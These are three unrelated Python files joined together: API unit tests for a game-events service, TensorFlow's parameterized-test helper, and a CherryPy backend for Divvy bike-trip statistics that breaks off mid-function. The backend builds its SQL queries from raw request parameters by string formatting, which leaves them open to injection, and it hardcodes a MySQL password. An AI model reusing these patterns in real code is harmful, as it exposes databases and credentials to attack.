follow_redirects=True)
# Assert response is 400 BAD REQUEST.
self.assertEquals(response.status, "400 BAD REQUEST")
def test_token_invalid_apikey(self):
'''
Token request with invalid credentials and valid sessionid.
'''
requestdata = json.dumps(dict(clientid="myclientidaaaaa", apikey="myapikeyaaaa", sessionid=self.newsessionid))
response = self.client.post('/gameevents/api/v1.0/token',
data=requestdata,
content_type = 'application/json',
follow_redirects=True)
# Assert response is 200 OK.
self.assertEquals(response.status, "401 UNAUTHORIZED")
def test_token_invalid_clientid(self):
'''
Token request with valid clientid but invalid apikey, and valid sessionid.
'''
requestdata = json.dumps(dict(clientid="myclientid", apikey="myapikeyaaaa", sessionid=self.newsessionid))
response = self.client.post('/gameevents/api/v1.0/token',
data=requestdata,
content_type = 'application/json',
follow_redirects=True)
# Assert response is 200 OK.
self.assertEquals(response.status, "401 UNAUTHORIZED")
def test_commit_xmlgameevent_validtoken(self):
'''
Game event commit request with valid token and invalid game event (in XML instead of JSON).
'''
token = self.mytoken.decode()
headers = {}
sessionid = self.newsessionid
headers['X-AUTH-TOKEN'] = token
gameevent = self.xml_valid_event
timestamp = str(datetime.datetime.now())
requestdata = json.dumps(dict(timestamp=timestamp, events=gameevent))
response = self.client.post('/gameevents/api/v1.0/sessions/%s/events' % sessionid,
data=requestdata,
headers=headers,
content_type = 'application/json',
follow_redirects=True)
self.assertEquals(response.status, "400 BAD REQUEST")
def test_commit_gameevent_incompletejsonrequest(self):
'''
Game event commit request with valid token and invalid game event (invalid JSON).
'''
token = self.mytoken.decode()
headers = {}
sessionid = self.newsessionid
headers['X-AUTH-TOKEN'] = token
requestdata = "{json:\"badlyformed\""
response = self.client.post('/gameevents/api/v1.0/sessions/%s/events' % sessionid,
data=requestdata,
headers=headers,
content_type = 'application/json',
follow_redirects=True)
self.assertEquals(response.status, "400 BAD REQUEST")
def test_commit_jsongameevent_validtoken(self):
'''
Game event commit request with valid token and valid game event.
'''
token = self.mytoken.decode()
headers = {}
headers['X-AUTH-TOKEN'] = token
sessionid = self.newsessionid
gameevent = self.json_valid_event
timestamp = str(datetime.datetime.now())
requestdata = json.dumps(dict(timestamp=timestamp, events=gameevent))
response = self.client.post('/gameevents/api/v1.0/sessions/%s/events' % sessionid,
data=requestdata,
headers=headers,
content_type = 'application/json',
follow_redirects=True)
self.assertEquals(response.status, "201 CREATED")
#self.assertFail()
def test_commit_invalidjsongameevent_validtoken(self):
'''
Game event commit request with valid token and invalid game event (invalid JSON).
'''
token = self.mytoken.decode()
headers = {}
sessionid = self.newsessionid
gameevent = self.json_invalid_event
headers['X-AUTH-TOKEN'] = token
timestamp = str(datetime.datetime.now())
requestdata = json.dumps(dict(timestamp=timestamp, events=gameevent))
response = self.client.post('/gameevents/api/v1.0/sessions/%s/events' % sessionid,
data=requestdata,
headers=headers,
content_type = 'application/json',
follow_redirects=True)
self.assertEquals(response.status, "400 BAD REQUEST")
def test_commit_invalidxmlgameevent_validtoken(self):
'''
Game event commit request with valid token and invalid game event (in invalid XML).
'''
token = self.mytoken.decode()
headers = {}
sessionid = self.newsessionid
headers['X-AUTH-TOKEN'] = token
gameevent = self.xml_invalid_event
timestamp = str(datetime.datetime.now())
requestdata = json.dumps(dict(timestamp=timestamp, events=gameevent))
response = self.client.post('/gameevents/api/v1.0/sessions/%s/events' % sessionid,
data=requestdata,
headers=headers,
content_type = 'application/json',
follow_redirects=True)
self.assertEquals(response.status, "400 BAD REQUEST")
def test_commit_multiplexmlgameevent_validtoken(self):
'''
Game event commit request with valid token and multiple game events (but in XML, not JSON).
'''
token = self.mytoken.decode()
headers = {}
sessionid = self.newsessionid
headers['X-AUTH-TOKEN'] = token
gameevent = self.xml_multiple_events
timestamp = str(datetime.datetime.now())
requestdata = json.dumps(dict(timestamp=timestamp, events=gameevent))
response = self.client.post('/gameevents/api/v1.0/sessions/%s/events' % sessionid,
data=requestdata,
headers=headers,
content_type = 'application/json',
follow_redirects=True)
self.assertEquals(response.status, "400 BAD REQUEST")
def test_commit_multiplejsongameevent_validtoken(self):
'''
Game event commit request with valid token and multiple valid game events.
'''
token = self.mytoken.decode()
headers = {}
sessionid = self.newsessionid
headers['X-AUTH-TOKEN'] = token
gameevent = self.json_multiple_events
timestamp = str(datetime.datetime.now())
requestdata = json.dumps(dict(timestamp=timestamp, events=gameevent))
response = self.client.post('/gameevents/api/v1.0/sessions/%s/events' % sessionid,
data=requestdata,
headers=headers,
content_type = 'application/json',
follow_redirects=True)
json_results = json.loads(response.get_data().decode())
self.assertEquals(json_results["message"], "Created 2 new item(s).")
self.assertEquals(response.status, "201 CREATED")
#self.assertFail()
def test_commit_gameevent_validtoken_newsessionid(self):
'''
Game event commit request with valid token but for a session not in the database.
'''
token = self.mytokennewsession.decode()
sessionid = self.newsessionid3
gameevent = self.json_valid_event
timestamp = str(datetime.datetime.now())
headers = {}
headers['X-AUTH-TOKEN'] = token
requestdata = json.dumps(dict(timestamp=timestamp, events=gameevent))
response = self.client.post('/gameevents/api/v1.0/sessions/%s/events' % sessionid,
data=requestdata,
headers=headers,
content_type = 'application/json',
follow_redirects=True)
self.assertEquals(response.status, "404 NOT FOUND")
def test_commit_gameevent_expiredtoken(self):
'''
Game event commit request with expired token.
'''
token = self.myexpiredtoken.decode()
sessionid = self.newsessionid
gameevent = self.json_valid_event
timestamp = str(datetime.datetime.now())
requestdata = json.dumps(dict(timestamp=timestamp, events=gameevent))
headers = {}
headers['X-AUTH-TOKEN'] = token
response = self.client.post('/gameevents/api/v1.0/sessions/%s/events' % sessionid,
data=requestdata,
headers=headers,
content_type = 'application/json',
follow_redirects=True)
self.assertEquals(response.status, "401 UNAUTHORIZED")
def test_commit_gameevent_badtoken(self):
'''
Game event commit request with bad token.
'''
sessionid = self.newsessionid
token = self.mybadtoken.decode()
gameevent = self.json_valid_event
timestamp = str(datetime.datetime.now())
headers = {}
headers['X-AUTH-TOKEN'] = token
requestdata = json.dumps(dict(timestamp=timestamp, events=gameevent))
response = self.client.post('/gameevents/api/v1.0/sessions/%s/events' % sessionid,
data=requestdata,
headers=headers,
content_type = 'application/json',
follow_redirects=True)
self.assertEquals(response.status, "401 UNAUTHORIZED")
def test_getgameevents(self):
'''
List game events for a given session with valid token.
'''
token = self.mytoken.decode()
sessionid = self.newsessionid
headers = {}
headers['X-AUTH-TOKEN'] = token
response = self.client.get('/gameevents/api/v1.0/sessions/%s/events' % sessionid,
headers=headers,
content_type = 'application/json',
follow_redirects=True)
self.assertEquals(response.status, "200 OK")
def test_getgameevents_badtoken(self):
'''
List game events for a given session with invalid token.
'''
token = self.mybadtoken.decode()
headers = {}
headers['X-AUTH-TOKEN'] = token
sessionid = self.newsessionid
response = self.client.get('/gameevents/api/v1.0/sessions/%s/events' % sessionid,
headers=headers,
content_type = 'application/json',
follow_redirects=True)
self.assertEquals(response.status, "401 UNAUTHORIZED")
def test_newclient_admintoken(self):
'''
Add a new client to database, using admin token, with good parameters.
'''
token = self.myadmintoken.decode()
headers = {}
headers['X-AUTH-TOKEN'] = token
requestdata = json.dumps(dict(clientid="testclientid", apikey="testapikey"))
response = self.client.post('/gameevents/api/v1.0/admin/clients',
data=requestdata,
headers=headers,
content_type = 'application/json',
follow_redirects=True)
self.assertEquals(response.status, "201 CREATED")
def test_newclient_bad_request_missing_params(self):
'''
Try to add a new client to database, without a token.
'''
requestdata = json.dumps(dict(clientid="lix", apikey="lixapikey"))
response = self.client.post('/gameevents/api/v1.0/admin/clients',
data=requestdata,
content_type = 'application/json',
follow_redirects=True)
self.assertEquals(response.status, "400 BAD REQUEST")
def test_newexistingclient(self):
'''
Try to add client that already exists in database, using admin token, with good parameters.
'''
token = self.myadmintoken.decode()
headers = {}
headers['X-AUTH-TOKEN'] = token
requestdata = json.dumps(dict(clientid="myclientid", apikey="testapikey"))
response = self.client.post('/gameevents/api/v1.0/admin/clients',
data=requestdata,
headers=headers,
content_type = 'application/json',
follow_redirects=True)
self.assertEquals(response.status, "409 CONFLICT")
def test_newclient_nonadmintoken(self):
'''
Try to add a new client to database, with non-admin token.
'''
token = self.mytoken.decode()
headers = {}
headers['X-AUTH-TOKEN'] = token
requestdata = json.dumps(dict(clientid="testclientid", apikey="testapikey"))
response = self.client.post('/gameevents/api/v1.0/admin/clients',
data=requestdata,
headers=headers,
content_type = 'application/json',
follow_redirects=True)
self.assertEquals(response.status, "401 UNAUTHORIZED")
def test_newclient_expiredadmintoken(self):
'''
Try to add a new client to database, with expired admin token.
'''
token = self.myexpiredadmintoken.decode()
headers = {}
headers['X-AUTH-TOKEN'] = token
requestdata = json.dumps(dict(clientid="testclientid", apikey="testapikey"))
response = self.client.post('/gameevents/api/v1.0/admin/clients',
data=requestdata,
headers=headers,
content_type = 'application/json',
follow_redirects=True)
self.assertEquals(response.status, "401 UNAUTHORIZED")
def test_newclient_badtoken(self):
'''
Try to add a new client to database, with bad token.
'''
token = self.mybadtoken.decode()
headers = {}
headers['X-AUTH-TOKEN'] = token
requestdata = json.dumps(dict(clientid="testclientid", apikey="testapikey"))
response = self.client.post('/gameevents/api/v1.0/admin/clients',
data=requestdata,
headers=headers,
content_type = 'application/json',
follow_redirects=True)
self.assertEquals(response.status, "401 UNAUTHORIZED")
def test_getsessions_validtoken(self):
'''
Get list of active sessions, with valid admin token.
'''
token = self.myadmintoken.decode()
headers = {}
headers['X-AUTH-TOKEN'] = token
response = self.client.get('/gameevents/api/v1.0/sessions',
headers=headers,
follow_redirects=True)
#json_results = json.loads(response.get_data().decode())
self.assertEquals(response.status, "200 OK")
#self.assertEquals(response.headers["X-Total-Count"], '3')
def test_getsessions_notoken(self):
'''
Get list of active sessions, without a token.
'''
response = self.client.get('/gameevents/api/v1.0/sessions',
follow_redirects=True)
self.assertEquals(response.status, "400 BAD REQUEST")
def test_getsessions_invalidtoken(self):
'''
Get list of active sessions, with expired admin token.
'''
token = self.myexpiredadmintoken.decode()
headers = {}
headers['X-AUTH-TOKEN'] = token
response = self.client.get('/gameevents/api/v1.0/sessions',
headers=headers,
follow_redirects=True)
self.assertEquals(response.status, "401 UNAUTHORIZED")
if __name__ == '__main__':
unittest.main()
|
|
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Adds support for parameterized tests to Python's unittest TestCase class.
A parameterized test is a method in a test case that is invoked with different
argument tuples.
A simple example:
class AdditionExample(parameterized.ParameterizedTestCase):
@parameterized.Parameters(
(1, 2, 3),
(4, 5, 9),
(1, 1, 3))
def testAddition(self, op1, op2, result):
self.assertEqual(result, op1 + op2)
Each invocation is a separate test case and properly isolated just
like a normal test method, with its own setUp/tearDown cycle. In the
example above, there are three separate testcases, one of which will
fail due to an assertion error (1 + 1 != 3).
Parameters for invididual test cases can be tuples (with positional parameters)
or dictionaries (with named parameters):
class AdditionExample(parameterized.ParameterizedTestCase):
@parameterized.Parameters(
{'op1': 1, 'op2': 2, 'result': 3},
{'op1': 4, 'op2': 5, 'result': 9},
)
def testAddition(self, op1, op2, result):
self.assertEqual(result, op1 + op2)
If a parameterized test fails, the error message will show the
original test name (which is modified internally) and the arguments
for the specific invocation, which are part of the string returned by
the shortDescription() method on test cases.
The id method of the test, used internally by the unittest framework,
is also modified to show the arguments. To make sure that test names
stay the same across several invocations, object representations like
>>> class Foo(object):
... pass
>>> repr(Foo())
'<__main__.Foo object at 0x23d8610>'
are turned into '<__main__.Foo>'. For even more descriptive names,
especially in test logs, you can use the NamedParameters decorator. In
this case, only tuples are supported, and the first parameters has to
be a string (or an object that returns an apt name when converted via
str()):
class NamedExample(parameterized.ParameterizedTestCase):
@parameterized.NamedParameters(
('Normal', 'aa', 'aaa', True),
('EmptyPrefix', '', 'abc', True),
('BothEmpty', '', '', True))
def testStartsWith(self, prefix, string, result):
self.assertEqual(result, string.startswith(prefix))
Named tests also have the benefit that they can be run individually
from the command line:
$ testmodule.py NamedExample.testStartsWithNormal
.
--------------------------------------------------------------------
Ran 1 test in 0.000s
OK
Parameterized Classes
=====================
If invocation arguments are shared across test methods in a single
ParameterizedTestCase class, instead of decorating all test methods
individually, the class itself can be decorated:
@parameterized.Parameters(
(1, 2, 3),
(4, 5, 9))
class ArithmeticTest(parameterized.ParameterizedTestCase):
def testAdd(self, arg1, arg2, result):
self.assertEqual(arg1 + arg2, result)
def testSubtract(self, arg1, arg2, result):
self.assertEqual(result - arg1, arg2)
Inputs from Iterables
=====================
If parameters should be shared across several test cases, or are dynamically
created from other sources, a single non-tuple iterable can be passed into
the decorator. This iterable will be used to obtain the test cases:
class AdditionExample(parameterized.ParameterizedTestCase):
@parameterized.Parameters(
c.op1, c.op2, c.result for c in testcases
)
def testAddition(self, op1, op2, result):
self.assertEqual(result, op1 + op2)
Single-Argument Test Methods
============================
If a test method takes only one argument, the single arguments must not be
wrapped into a tuple:
class NegativeNumberExample(parameterized.ParameterizedTestCase):
@parameterized.Parameters(
-1, -3, -4, -5
)
def testIsNegative(self, arg):
self.assertTrue(IsNegative(arg))
List/tuple as a Single Argument
===============================
If a test method takes a single argument of a list/tuple, it must be wrapped
inside a tuple:
class ZeroSumExample(parameterized.ParameterizedTestCase):
@parameterized.Parameters(
([-1, 0, 1], ),
([-2, 0, 2], ),
)
def testSumIsZero(self, arg):
self.assertEqual(0, sum(arg))
"""
import collections
import functools
import re
import types
import unittest
import uuid
import six
from tensorflow.python.platform import googletest
ADDR_RE = re.compile(r'\<([a-zA-Z0-9_\-\.]+) object at 0x[a-fA-F0-9]+\>')
_SEPARATOR = uuid.uuid1().hex
_FIRST_ARG = object()
_ARGUMENT_REPR = object()
def _CleanRepr(obj):
return ADDR_RE.sub(r'<\1>', repr(obj))
# Helper function formerly from the unittest module, removed from it in
# Python 2.7.
def _StrClass(cls):
return '%s.%s' % (cls.__module__, cls.__name__)
def _NonStringIterable(obj):
return (isinstance(obj, collections.Iterable) and not
isinstance(obj, six.string_types))
def _FormatParameterList(testcase_params):
if isinstance(testcase_params, collections.Mapping):
return ', '.join('%s=%s' % (argname, _CleanRepr(value))
for argname, value in six.iteritems(testcase_params))
elif _NonStringIterable(testcase_params):
return ', '.join(map(_CleanRepr, testcase_params))
else:
return _FormatParameterList((testcase_params,))
class _ParameterizedTestIter(object):
"""Callable and iterable class for producing new test cases."""
def __init__(self, test_method, testcases, naming_type):
"""Returns concrete test functions for a test and a list of parameters.
The naming_type is used to determine the name of the concrete
functions as reported by the unittest framework. If naming_type is
_FIRST_ARG, the testcases must be tuples, and the first element must
have a string representation that is a valid Python identifier.
Args:
test_method: The decorated test method.
testcases: (list of tuple/dict) A list of parameter
tuples/dicts for individual test invocations.
naming_type: The test naming type, either _NAMED or _ARGUMENT_REPR.
"""
self._test_method = test_method
self.testcases = testcases
self._naming_type = naming_type
self.__name__ = _ParameterizedTestIter.__name__
def __call__(self, *args, **kwargs):
raise RuntimeError('You appear to be running a parameterized test case '
'without having inherited from parameterized.'
'ParameterizedTestCase. This is bad because none of '
'your test cases are actually being run. You may also '
'be using a mock annotation before the parameterized '
'one, in which case you should reverse the order.')
def __iter__(self):
test_method = self._test_method
naming_type = self._naming_type
def MakeBoundParamTest(testcase_params):
@functools.wraps(test_method)
def BoundParamTest(self):
if isinstance(testcase_params, collections.Mapping):
test_method(self, **testcase_params)
elif _NonStringIterable(testcase_params):
test_method(self, *testcase_params)
else:
test_method(self, testcase_params)
if naming_type is _FIRST_ARG:
# Signal the metaclass that the name of the test function is unique
# and descriptive.
BoundParamTest.__x_use_name__ = True
# Support PEP-8 underscore style for test naming if used.
if (BoundParamTest.__name__.startswith('test_')
and testcase_params[0]
and not testcase_params[0].startswith('_')):
BoundParamTest.__name__ += '_'
BoundParamTest.__name__ += str(testcase_params[0])
testcase_params = testcase_params[1:]
elif naming_type is _ARGUMENT_REPR:
# __x_extra_id__ is used to pass naming information to the __new__
# method of TestGeneratorMetaclass.
# The metaclass will make sure to create a unique, but nondescriptive
# name for this test.
BoundParamTest.__x_extra_id__ = '(%s)' % (
_FormatParameterList(testcase_params),)
else:
raise RuntimeError('%s is not a valid naming type.' % (naming_type,))
BoundParamTest.__doc__ = '%s(%s)' % (
BoundParamTest.__name__, _FormatParameterList(testcase_params))
if test_method.__doc__:
BoundParamTest.__doc__ += '\n%s' % (test_method.__doc__,)
return BoundParamTest
return (MakeBoundParamTest(c) for c in self.testcases)
def _IsSingletonList(testcases):
"""True iff testcases contains only a single non-tuple element."""
return len(testcases) == 1 and not isinstance(testcases[0], tuple)
def _ModifyClass(class_object, testcases, naming_type):
assert not getattr(class_object, '_id_suffix', None), (
'Cannot add parameters to %s,'
' which already has parameterized methods.' % (class_object,))
class_object._id_suffix = id_suffix = {}
for name, obj in list(six.iteritems(class_object.__dict__)):
if (name.startswith(unittest.TestLoader.testMethodPrefix)
and isinstance(obj, types.FunctionType)):
delattr(class_object, name)
methods = {}
_UpdateClassDictForParamTestCase(
methods, id_suffix, name,
_ParameterizedTestIter(obj, testcases, naming_type))
for name, meth in six.iteritems(methods):
setattr(class_object, name, meth)
def _ParameterDecorator(naming_type, testcases):
"""Implementation of the parameterization decorators.
Args:
naming_type: The naming type.
testcases: Testcase parameters.
Returns:
A function for modifying the decorated object.
"""
def _Apply(obj):
if isinstance(obj, type):
_ModifyClass(
obj,
list(testcases) if not isinstance(testcases, collections.Sequence)
else testcases,
naming_type)
return obj
else:
return _ParameterizedTestIter(obj, testcases, naming_type)
if _IsSingletonList(testcases):
assert _NonStringIterable(testcases[0]), (
'Single parameter argument must be a non-string iterable')
testcases = testcases[0]
return _Apply
def Parameters(*testcases):
"""A decorator for creating parameterized tests.
See the module docstring for a usage example.
Args:
*testcases: Parameters for the decorated method, either a single
iterable, or a list of tuples/dicts/objects (for tests
with only one argument).
Returns:
A test generator to be handled by TestGeneratorMetaclass.
"""
return _ParameterDecorator(_ARGUMENT_REPR, testcases)
def NamedParameters(*testcases):
"""A decorator for creating parameterized tests.
See the module docstring for a usage example. The first element of
each parameter tuple should be a string and will be appended to the
name of the test method.
Args:
*testcases: Parameters for the decorated method, either a single
iterable, or a list of tuples.
Returns:
A test generator to be handled by TestGeneratorMetaclass.
"""
return _ParameterDecorator(_FIRST_ARG, testcases)
class TestGeneratorMetaclass(type):
"""Metaclass for test cases with test generators.
A test generator is an iterable in a testcase that produces callables. These
callables must be single-argument methods. These methods are injected into
the class namespace and the original iterable is removed. If the name of the
iterable conforms to the test pattern, the injected methods will be picked
up as tests by the unittest framework.
In general, it is supposed to be used in conjuction with the
Parameters decorator.
"""
def __new__(mcs, class_name, bases, dct):
dct['_id_suffix'] = id_suffix = {}
for name, obj in list(six.iteritems(dct)):
if (name.startswith(unittest.TestLoader.testMethodPrefix) and
_NonStringIterable(obj)):
iterator = iter(obj)
dct.pop(name)
_UpdateClassDictForParamTestCase(dct, id_suffix, name, iterator)
return type.__new__(mcs, class_name, bases, dct)
def _UpdateClassDictForParamTestCase(dct, id_suffix, name, iterator):
"""Adds individual test cases to a dictionary.
Args:
dct: The target dictionary.
id_suffix: The dictionary for mapping names to test IDs.
name: The original name of the test case.
iterator: The iterator generating the individual test cases.
"""
for idx, func in enumerate(iterator):
assert callable(func), 'Test generators must yield callables, got %r' % (
func,)
if getattr(func, '__x_use_name__', False):
new_name = func.__name__
else:
new_name = '%s%s%d' % (name, _SEPARATOR, idx)
assert new_name not in dct, (
'Name of parameterized test case "%s" not unique' % (new_name,))
dct[new_name] = func
id_suffix[new_name] = getattr(func, '__x_extra_id__', '')
class ParameterizedTestCase(
six.with_metaclass(TestGeneratorMetaclass, googletest.TestCase)):
"""Base class for test cases using the Parameters decorator."""
def _OriginalName(self):
return self._testMethodName.split(_SEPARATOR)[0]
def __str__(self):
return '%s (%s)' % (self._OriginalName(), _StrClass(self.__class__))
def id(self): # pylint: disable=invalid-name
"""Returns the descriptive ID of the test.
This is used internally by the unittesting framework to get a name
for the test to be used in reports.
Returns:
The test id.
"""
return '%s.%s%s' % (_StrClass(self.__class__),
self._OriginalName(),
self._id_suffix.get(self._testMethodName, ''))
|
|
import sys
sys.stdout = sys.stderr
import os
import atexit
import threading
import cherrypy
import MySQLdb
import pickle
import subprocess
from collections import OrderedDict
from datetime import datetime
from dateutil import parser
db = MySQLdb.connect(
host="127.0.0.1",
user="divvy",
passwd="keepC4LM",
db="divvy"
)
if subprocess.check_output("hostname") == "praxis\n":
PATH = ""
else:
PATH = "/var/www/cs424/p2/py"
c = db.cursor()
def parse_age(age):
"""Parse age groups... when you get an age, return the range as its displayed
in the pie chart. This is currently unused.
Args:
age - int
Returns:
tuple - two ints, uninclusive
"""
if age == "Under 20":
return (0, 20)
elif age == "20-29":
return (19,30)
elif age == "30-39":
return (29, 40)
elif age == "40-49":
return (39, 50)
elif age == "50-59":
return (49, 60)
elif age == "60+":
return (59, 180)
def parse_time_of_day(time_of_day):
"""given a time of day string, return the time range (inclusive).
Args:
time_of_day - string, one of morning, lunch, "after work", or evening
Returns:
a two tuple of inclusive time range (low, high)
"""
if time_of_day == "morning":
return(6, 9)
elif time_of_day == "lunch":
return(11,13)
elif time_of_day == "after work":
return(4, 7)
elif time_of_day == "evening":
return(7,9)
def store_popularity_groups():
"""Stores popularity in a pickle. To be run offline."""
with open("stations.pickle", "rb") as f:
stations = pickle.load(f)
with open("id_popularity.pickle", "rb") as f:
id_pop = pickle.load(f)
pop_rankings = id_pop.values()
pop_rankings.sort()
d = {
0: [], 1: [], 2: [], 3: [], 4:[], 5:[], 6:[]
}
for sid, count in id_pop.items():
if count in pop_rankings[0:10]:
d[0].append(stations[sid])
elif count in pop_rankings[10:50]:
d[1].append(stations[sid])
elif count in pop_rankings[50:100]:
d[2].append(stations[sid])
elif count in pop_rankings[100:150]:
d[3].append(stations[sid])
elif count in pop_rankings[150:200]:
d[4].append(stations[sid])
elif count in pop_rankings[200:250]:
d[5].append(stations[sid])
elif count in pop_rankings[250:300]:
d[6].append(stations[sid])
with open("popularity.pickle", "wb") as f:
pickle.dump(d,f)
cherrypy.config.update({'environment': 'embedded', 'show_tracebacks': True, 'log.error_file': '/tmp/p2site.log'})
if cherrypy.__version__.startswith('3.0') and cherrypy.engine.state == 0:
cherrypy.engine.start(blocking=False)
atexit.register(cherrypy.engine.stop)
class Root(object):
""" Root class for the cherrypy instance running the backend """
def index(self):
"""Hello world, for index"""
cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
return 'Hello World!'
index.exposed = True
def rides_by_day_of_year(self):
"""Display the number of rides on each day of the year.
Returns a csv like Date,Count
"""
cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
q = """
SELECT
startdate,
count(*)
FROM
divvy_trips_distances
GROUP BY
startdate
"""
c.execute(q)
ret = []
ret.append("Date,Count")
for row in c.fetchall():
print "match1 %s" % type(row[0])
dt = row[0]
if dt == parser.parse('2013-06-27').date:
date = 'June 27, 2013'
elif dt.day == 1:
print "match2"
date = "%s %s" % (dt.strftime("%b"), dt.year)
else:
date = " "
ret.append("%s,%s" % (date, row[1]))
return "\n".join(ret)
rides_by_day_of_year.exposed = True
def gender(self,
date=None,
gender=None,
subscriber=None,
age=None,
stations=None):
"""Display the gender breakdown of riders based on filters
Args (all optional):
gender - string - Male or Female
subscriber - string - Subscriber or Customer
age - a string like "low,high"
station - a string like "station_id1,station_id2,station_id3"
Returns:
a csv like Gender,Count
"""
cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
where = "WHERE "
if date or gender or subscriber or age or stations:
where_stmts = []
if date:
where_stmts.append("startdate like '%s'" % date)
if gender:
where_stmts.append("gender like '%s' " % gender)
if subscriber:
where_stmts.append("usertype like '%s%%' " % subscriber)
if age:
bottom, top = age.split(",")
where_stmts.append("age_in_2014 < %s " % top)
where_stmts.append("age_in_2014 > %s " % bottom)
if stations:
# since its bikes out, we'll only look at the depating station
stations = stations.split(",")
where_stmts.append("from_station_id in ('%s')" % \
"', '".join(stations))
if where_stmts:
where = where + where_stmts[0]
for stmt in where_stmts[1:]:
where += "AND " + stmt + " "
else:
where = ""
q = """
SELECT
gender,
count(*)
FROM
divvy_trips_distances
%s
GROUP BY
gender
""" % where
c.execute(q)
ret = []
ret.append("Gender,Count")
for row in c.fetchall():
if not row[0]:
ret.append("Unknown,%d" % row[1])
else:
ret.append("%s,%d" % (row[0], row[1]))
return "\n".join(ret)
gender.exposed = True
def usertype(self,
date=None,
gender=None,
subscriber=None,
age=None,
stations=None):
"""Displays statistics on usertype.
Args (all optional):
gender - string - Male or Female
subscriber - string - Subscriber or Customer
age - a string like "low,high"
station - a string like "station_id1,station_id2,station_id3"
Returns a csv like Usertype,Count
"""
cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
where = "WHERE "
if date or gender or subscriber or age or stations:
where_stmts = []
if date:
where_stmts.append("startdate like '%s'" % date)
if gender:
where_stmts.append("gender like '%s' " % gender)
if subscriber:
where_stmts.append("usertype like '%s%%' " % subscriber)
if age:
bottom, top = age.split(",")
where_stmts.append("age_in_2014 < %s " % top)
where_stmts.append("age_in_2014 > %s " % bottom)
if stations:
# since its bikes out, we'll only look at the depating station
stations = stations.split(",")
where_stmts.append("from_station_id in ('%s')" % \
"', '".join(stations))
if where_stmts:
where = where + where_stmts[0]
for stmt in where_stmts[1:]:
where += "AND " + stmt + " "
else:
where = ""
q = """
SELECT
usertype,
count(*)
FROM
divvy_trips_distances
%s
GROUP BY
usertype
""" % where
c.execute(q)
ret = []
ret.append("Type,Count")
for row in c.fetchall():
ret.append("%s,%d" % (row[0], row[1]))
return "\n".join(ret)
usertype.exposed = True
def age(self,
date=None,
gender=None,
subscriber=None,
age=None,
stations=None):
"""Displays statistics on age, based on filters.
Args (all optional):
gender - string - Male or Female
subscriber - string - Subscriber or Customer
age - a string like "low,high"
station - a string like "station_id1,station_id2,station_id3"
Returns a csv like Age,Count
"""
cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
where = "WHERE "
if date or gender or subscriber or age or stations:
where_stmts = []
if date:
where_stmts.append("startdate like '%s'" % date)
if gender:
where_stmts.append("gender like '%s' " % gender)
if subscriber:
where_stmts.append("usertype like '%s%%' " % subscriber)
if age:
bottom, top = age.split(",")
where_stmts.append("age_in_2014 < %s " % top)
where_stmts.append("age_in_2014 > %s " % bottom)
if stations:
# since its bikes out, we'll only look at the depating station
stations = stations.split(",")
where_stmts.append("from_station_id in ('%s')" % \
"', '".join(stations))
if where_stmts:
where = where + where_stmts[0]
for stmt in where_stmts[1:]:
where += "AND " + stmt + " "
else:
where = ""
q = """
SELECT
age_in_2014,
count(*)
FROM
divvy_trips_distances
%s
GROUP BY
age_in_2014
""" % where
undertwenty = 0
twenties = 0
thirties = 0
forties = 0
fifties = 0
sixtyplus = 0
print "q looks like %s" % q
c.execute(q)
for row in c.fetchall():
if row[0] < 20 and row[0] > 0:
undertwenty += row[1]
elif 30 > row[0] and row[0] > 19:
twenties += row[1]
elif 40 > row[0] and row[0] > 29:
thirties += row[1]
elif 50 > row[0] and row[0] > 39:
forties += row[1]
elif 60 > row[0] and row[0] > 49:
fifties += row[1]
elif row[0] > 59:
sixtyplus += row[1]
ret = [
"Age,Count",
"Under 20,%s" % undertwenty,
"20-29,%s" % twenties,
"30-39,%s" % thirties,
"40-49,%s" % forties,
"50-59,%s" % fifties,
"60+,%s" % sixtyplus,
]
return "\n".join(ret)
age.exposed = True
def outflow(self, station_id,
gender=None,
subscriber=None,
age=None):
"""Displays outflow data based on filters.
Args:
station_id - int - required
gender (optional) - string - Male or Female
subscriber (optional) - string - Subscriber or Customer
age (optional) - a string like "low,high"
Returns a csv like to_station_id,count
"""
cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
where = ""
if gender or subscriber or age:
where_stmts = []
if gender:
where_stmts.append("gender like '%s' " % gender)
if subscriber:
where_stmts.append("usertype like '%s%%' " % subscriber)
if age:
bottom, top = age.split(",")
where_stmts.append("age_in_2014 < %s " % top)
where_stmts.append("age_in_2014 > %s " % bottom)
if where_stmts:
for stmt in where_stmts:
where += "AND " + stmt + " "
else:
where = ""
q = """
SELECT
to_station_id,
count(*)
FROM
divvy_trips_distances
WHERE from_station_id = '%s'
%s
GROUP BY
to_station_id
""" % (station_id, where)
ret = []
ret.append("to_station,count")
c.execute(q)
count = 0
for row in c.fetchall():
ret.append("%s,%d" % (row[0],row[1]))
count += row[1]
#with open('/tmp/outflow', 'a') as f:
# f.write("window.outflow.set(%s, %d)\n " % (station_id, count))
return "\n".join(ret)
outflow.exposed = True
def inflow(self, station_id,
gender=None,
subscriber=None,
age=None):
"""Displays inflow data based on filters.
Args:
station_id - int - required
gender (optional) - string - Male or Female
subscriber (optional) - string - Subscriber or Customer
age (optional) - a string like "low,high"
Returns a csv like from_station_id,count
"""
cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
where = ""
if gender or subscriber or age:
where_stmts = []
if gender:
where_stmts.append("gender like '%s' " % gender)
if subscriber:
where_stmts.append("usertype like '%s%%' " % subscriber)
if age:
bottom, top = age.split(",")
where_stmts.append("age_in_2014 < %s " % top)
where_stmts.append("age_in_2014 > %s " % bottom)
if where_stmts:
for stmt in where_stmts:
where += "AND " + stmt + " "
else:
where = ""
q = """
SELECT
from_station_id,
count(*)
FROM
divvy_trips_distances
WHERE to_station_id = '%s'
%s
GROUP BY
from_station_id
""" % (station_id, where)
ret = []
ret.append("from_station,count")
c.execute(q)
count = 0
for row in c.fetchall():
